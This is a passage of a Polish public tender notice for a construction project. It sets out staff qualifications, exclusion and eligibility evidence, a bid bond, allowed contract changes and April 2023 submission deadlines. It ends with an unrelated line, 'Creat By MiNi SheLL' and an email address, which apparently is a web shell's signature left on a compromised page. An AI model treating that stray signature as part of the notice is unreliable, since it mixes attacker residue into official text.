wykonane w ramach jednej umowy.<br/>2/. dysponuje min. następującymi osobami :<br/>1. Przedstawicielem Wykonawcy, posiadającym :<br/>- doświadczenie, jako Przedstawiciel Wykonawcy / Kierownik Zespołu / Koordynator / Kierownik Projektu przy koordynacji/zarządzaniu prac związanych z realizacją min. jednej minimum budowy (w rozumieniu art. 3 pkt 6 ustawy z dn. 07.07.1994 r. - Prawo budowlane) obiektu kubaturowego o wartości nie mniejszej niż 3 000 000 zł brutto zrealizowanej w<br/>oparciu o warunki kontraktowe FIDIC lub równoważne. Przez warunki równoważne do FIDIC rozumie się wszelkie tożsame warunki i zasady dotyczące prowadzenia procesów inwestycyjnych mające odzwierciedlenie w prawie międzynarodowym, na podstawie których sporządzona została umowa na roboty budowlane np.:warunki kontraktowe UAV;, UAV-GC (Holandia), FABI-KVV (Belgia), VOB (Niemcy), JTC lub GMP (Wielka Brytania), PRAG (Polska).<br/>2. Kierownikiem budowy, posiadającym:<br/>- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń<br/>(lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów, w zakresie objętym przedmiotowym przedsięwzięciem), upoważniające do sprawowania funkcji kierownika budowy i należącym do właściwej Izby Samorządu Zawodowego;<br/>3. Kierownikiem robót sanitarnych, posiadającym:<br/>- uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń (lub odpowiadające im równoważne uprawnienia budowlane,<br/>które zostały wydane na podstawie wcześniej obowiązujących przepisów, w zakresie objętym przedmiotowym przedsięwzięciem), upoważniające do sprawowania funkcji kierownika robót sanitarnych i należącym do właściwej Izby Samorządu Zawodowego;<br/>Uwaga : Zamawiający nie wymaga zatrudnienia w/w osób na podstawie umowy o pracę. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1/. Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia<br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną<br/>ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej /zał. Nr 8/ dołączony do SWZ.<br/>2/. Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków,<br/>w zakresie art.109 ust. 1 pkt. 1 PZP, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego<br/>dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych<br/>należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie<br/>lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;<br/>3/. Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego<br/>Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na<br/>ubezpieczenia społeczne lub zdrowotne, w zakresie art. 109 ust. 1 pkt. 1 PZP, wystawionego nie wcześniej niż 3 miesiące przed<br/>upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym<br/>organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane<br/>prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego<br/>organu;<br/>4/. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia<br/>2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r., poz. 129, ze zm.) /zał. nr 9/ dołączony do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1/. Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>2/. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonywania oraz podmiotów na rzecz których roboty te zostały wykonane /zał. Nr 6/ dołączony do SWZ.<br/>3/. Dowody określające, czy te roboty budowlane zostały wykonane należycie (referencje bądź inne dokumenty sporządzone przez<br/>podmiot na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów- inne odpowiednie dokumenty).<br/>4/. Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za świadczenie usług,<br/>kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami /zał. Nr 7/ dołączony do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty z zał. nr 1, zgodnie ze wzorem załączonym do SWZ;<br/>2. Kosztorys ofertowy na podstawie załączonego przedmiaru.<br/>3. Oświadczenie wstępne z art. 125 ust. 1 ustawy PZP /zał. Nr 2/ dołączony do SWZ - oprócz Wykonawcy składa również podmiot udostępniający zasoby oraz odrębnie każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia- w zakresie braku podstaw wykluczenia oraz spełnienia warunków udziału w postępowaniu, w takim zakresie w jakim każdy z<br/>Wykonawców lub podmiotów udostępniających zasoby, wykazuje spełnianie tych warunków;<br/>4. Zobowiązanie do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia /zał. nr 3/ dołączony do SWZ - jeśli dotyczy.<br/>5. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117 ust. 4 ustawy PZP /zał. nr 4/ dołączony do SWZ- jeśli dotyczy.<br/>6. Wykonawca, którego oferta zostanie najwyżej oceniona, przedstawia oświadczenie o aktualności informacji zawartych w oświadczeniu wstępnym Wykonawcy z art. 125 ust. 1 ustawy PZP, w zakresie braku podstaw wykluczenia z postępowania /zał. nr 5/ dołączony do SWZ.<br/>7. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik : pełnomocnictwo określające jego zakres i podpisane przez<br/>osoby uprawnione do reprezentacji Wykonawcy;<br/>8. W przypadku, gdy Wykonawca - którego oferta zostanie najwyżej oceniona - polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 ustawy PZP, przedstawia na wezwanie Zamawiającego w odniesieniu do tych podmiotów, oświadczenie aktualizacyjne, o którym mowa w pkt 6.<br/>9. 9. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokumenty<br/>równoważne polskim dokumentom wymaganym przez Zamawiającego, określone w § 4 Rozporządzenia Ministra Rozwoju,<br/>Pracy i Technologii z dn. 30.12.2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2020 r., poz. 2415). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Każda składana oferta musi być zabezpieczona – przez cały okres związania ofertą wadium w wysokości : 70 000,00 zł, słownie: siedemdziesiąt tysięcy złotych 00/100.<br/><br/>2. Wadium może być wniesione w pieniądzu, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dn. 09 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j Dz.U. z 2022 r., poz. 2080, ze zm.). <br/>Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest<br/>załączenie dokumentu pełnomocnictwa do reprezentowania Wykonawców. Wszelka korespondencja prowadzona będzie<br/>wyłącznie z Pełnomocnikiem.<br/>2. Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa odrębnie oświadczenie wstępne z art.<br/>125 ust. 1 ustawy PZP w zakresie braku podstaw wykluczenia oraz spełnienia warunków udziału w postępowaniu, w takim<br/>zakresie w jakim każdy z Wykonawców, wykazuje spełnianie tych warunków.<br/>3. W przypadku, gdy zostanie oceniona najwyżej oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenie aktualizacyjne, o którym mowa w pkt IX.B.4 SWZ każdy z Wykonawców składa osobno.<br/>4. Członkowie konsorcjum ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie z art.117 ust.4 ustawy<br/>PZP, z którego wynika które roboty budowlane/dostawy/usługi wykonują poszczególni wykonawcy /zał. Nr 4 do SWZ/. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z art. 454 i 455 Pzp Zamawiający przewiduje zmiany zawartej umowy w stosunku do treści oferty wykonawcy oraz<br/>określa warunki takiej zmiany:<br/>(i) zmiany dokonane wg zasad określ. w Klauzuli 13 Warunków Kontraktowych<br/>(ii) zmiana dokonana na podst. art. 23 pkt 1 ustawy Prawo budowlane, zmiana w rozwiązaniach projektowych, jeżeli są one<br/>uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy;<br/>(iii) zmiana dokonana na podst. art. 20 ust. 1 pkt 4 lit. a) ustawy Prawo budowlane, uzgodniona możliwość wprowadzenia<br/>rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora<br/>nadzoru inwestorskiego, pod warunkiem, że zmiana ta spowodowana będzie okolicznościami zaistniałymi w trakcie<br/>realizacji robót budowlanych, których nie można było wcześniej przewidzieć;<br/>(iv) zmiany dokonane zostaną podczas wykonywania robót i nie odstępują w sposób istotny od zatwierdzonego projektu lub<br/>warunków pozwolenia na budowę w ramach art. 36a ust. 5 ustawy Prawo budowlane i dokonane zostaną zgodnie z<br/>zapisami art. 36a ust. 6 w/w ustawy, spełniając zapisy art. 57 ust. 2;<br/>(v) zmiana wynagrodzenia Wykonawcy w przypadku zmiany przez ustawodawcę przepisów dotyczących stawki procentowej<br/>należnego podatku VAT;<br/>(vi) zmiana w przypadku regulacji prawnych wprowadzonych w życie po Dacie Wejścia Kontraktu w życie, wywołujących<br/>potrzebę jego zmiany;<br/>(vii) zmiana oznaczenia danych Zamawiającego i/lub Wykonawcy;<br/>(viii) zmiana Personelu Wykonawcy lub Zamawiającego;<br/>(ix) zmiany Czasu na Ukończenie ze względu na zmiany terminów w promesie z Rządowego Funduszu Polski Ład<br/>Programu Inwestycji Strategicznych.<br/>(x) zmiana Czasu na Ukończenie według zasad określ. w Klauzuli 8.4 Warunków Kontraktowych;<br/>(xi) zmiana wynagrodzenia Wykonawcy w szczególności, w przypadkach określ. w Klauzuli: 2.1, 2.5, 4.7, 4.12, 4.24, 7.4,<br/>8.9, 16.1, 10.2, 10.3, 11.7,11.8,17.4,19.4.<br/>(xii) zmiana wynagrodzenia Wykonawcy wynikająca z waloryzacji określ. w Klauzuli 13.8 Warunków Kontraktu<br/>Jednak nie wymagają sporządzenia Zmiany do Kontraktu (Aneksu) zmiany postanowień Kontraktu na podstawie ppkt (viii)<br/>oraz zmiany, które nie powodują podwyższenia Zatwierdzonej Kwoty Kontraktowej i/lub Czasu na Ukończenie, chyba że<br/>warunki realizacji Rządowego Funduszu Polski Ład Programu Inwestycji Strategicznych stanowią inaczej.<br/>Zmiana postanowień Umowy w stosunku do treści oferty Wykonawcy możliwa jest także w przypadku zaistnienia jednej z<br/>nast. okoliczności i na warunkach określ. poniżej:<br/>I. Zmiany technologiczne spowodowane w szczególności następującymi okolicznościami:<br/>a) pozyskania na rynku materiałów lub urządzeń pozwalających na zmniejszenie kosztów realizacji Robót lub kosztów<br/>eksploatacji wykonanego przedmiotu umowy lub umożliwiające uzyskanie lepszej jakości Robót;<br/>b) wystąpienia odmiennych od przyjętych w Kontrakcie warunków geologicznych, archeologicznych bądź występujących<br/>niemożliwych do zidentyfikowania przed Datą Odniesienia innych przeszkód fizycznych, skutkujących niemożliwością<br/>zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych;<br/>c) konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze<br/>względu na zmiany obowiązującego prawa. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty nalezy składać przy użyciu platformy E-zamówienia, która jest dostępna pod adresem : https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-05 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Czas na ukończenie robót liczony będzie od Daty Rozpoczęcia.<br/>2. Pozostałe okoliczności zmiany umowy c.d. (pkt II - V):<br/>II. Zmiany spowodowane niekorzystnymi warunkami atmosferycznymi, które uniemożliwiają prowadzenie robót budowlanych<br/>zgodnie z technologią ich wykonania, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności z<br/>powodu technologii realizacji prac określonej Umową, normami lub innymi przepisami, wymagającej konkretnych warunków<br/>atmosferycznych. Konieczność wykonania Robót przypada zgodnie z zatwierdzonym Harmonogramem w warunkach jw., co<br/>mogłoby skutkować nienależytym wykonaniem tych Robót lub przedłużeniem czasu ich wykonania.<br/>Dotyczy to w szczególn.:<br/>(i) niskich temperatur powietrza (tzn. &lt; -15 ˚ C w ciągu co najmniej 5 kolejnych dni roboczych);<br/>(ii) wysokich temperatur powietrza powyżej 35 ˚C, w ciągu co najmniej 5 kolejnych dni roboczych,<br/>(iii) krótkotrwałych intensywnych (nawalnych) opadów deszczu o natężeniu co najmniej 40mm/m2 w czasie 1 godziny,<br/>podczas dnia roboczego;<br/>(iv) silnego (huraganowego) wiatru o prędkości w porywach powyżej 100km/h, uniemożliwiającego pracę maszyn<br/>budowlanych, podczas dnia roboczego.<br/>Termin wykonania może być przesunięty o tyle dni, o ile utrzymywały się niekorzystne warunki atmosferyczne oraz<br/>ewentualnie o okres usuwania ich skutków;<br/>III. Zmiany, odnoszące się do określenia Przedmiotu Zamówienia, w szczególności konieczności wykonania robót<br/>dodatkowych wpływających bezpośrednio lub pośrednio na realizację robót podstawowych;<br/>Zmiana wynagrodzenia należnego Wykonawcy w przypadku zmiany w robotach budowlanych niezbędnych do realizacji<br/>Umowy a nie ujętych w Ofercie zostanie ustalona z zastosowaniem następujących zasad:<br/>a) jeżeli roboty odpowiadają opisowi pozycji w Zestawieniu kosztów, jest możliwe ustalenie nowej ceny poprzez interpolację<br/>danej pozycji z Zestawienia kosztów,<br/>b) jeżeli nie można wycenić robót z zastosowaniem metody, o której mowa w lit. a) powyżej, Wykonawca powinien<br/>przedłożyć do akceptacji Inżyniera kalkulację Ceny tych robót z uwzględnieniem średnich cen i stawek publikowanych w<br/>wydawnictwach branżowych SEKOCENBUD krajowych, za kwartał poprzedzający wystąpienie okoliczności uprawniających<br/>wykonawcę do zmiany w robotach.<br/>IV. Zmiany będące następstwem działania organów administracji i innych podmiotów o kompetencjach zbliżonych do<br/>organów administracji w szczególności eksploatatorów infrastruktury oraz właścicieli gruntów niezbędnych pod inwestycję, w<br/>szczególności: przedłużenia, z przyczyn niezależnych od Wykonawcy, czasu wydania decyzji administracyjnych przez<br/>właściwe organy, jeżeli okres ten będzie dłuższy niż jeden miesiąc w stosunku do terminów wynikających z obowiązujących prawem terminów, jeżeli uniemożliwia to lub wstrzymuje realizację określonego rodzaju Robót;<br/>V. Zmiany odnoszące się formy i treści Rozliczeń oraz Minimalnej kwoty Przejściowego Świadectwa Płatności będące<br/>następstwem zmiany przepisów / wytycznych w zakresie finansowania inwestycji z programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych, jak też wytycznych / zasad rozliczania otrzymanego dofinansowania.<br/>3.Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych wymienionych w pkt. V.5.7).ogłoszenia, potwierdzających okoliczności, o których mowa w art. 57 ustawy PZP, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.

Creat By MiNi SheLL
Email: jattceo@gmail.com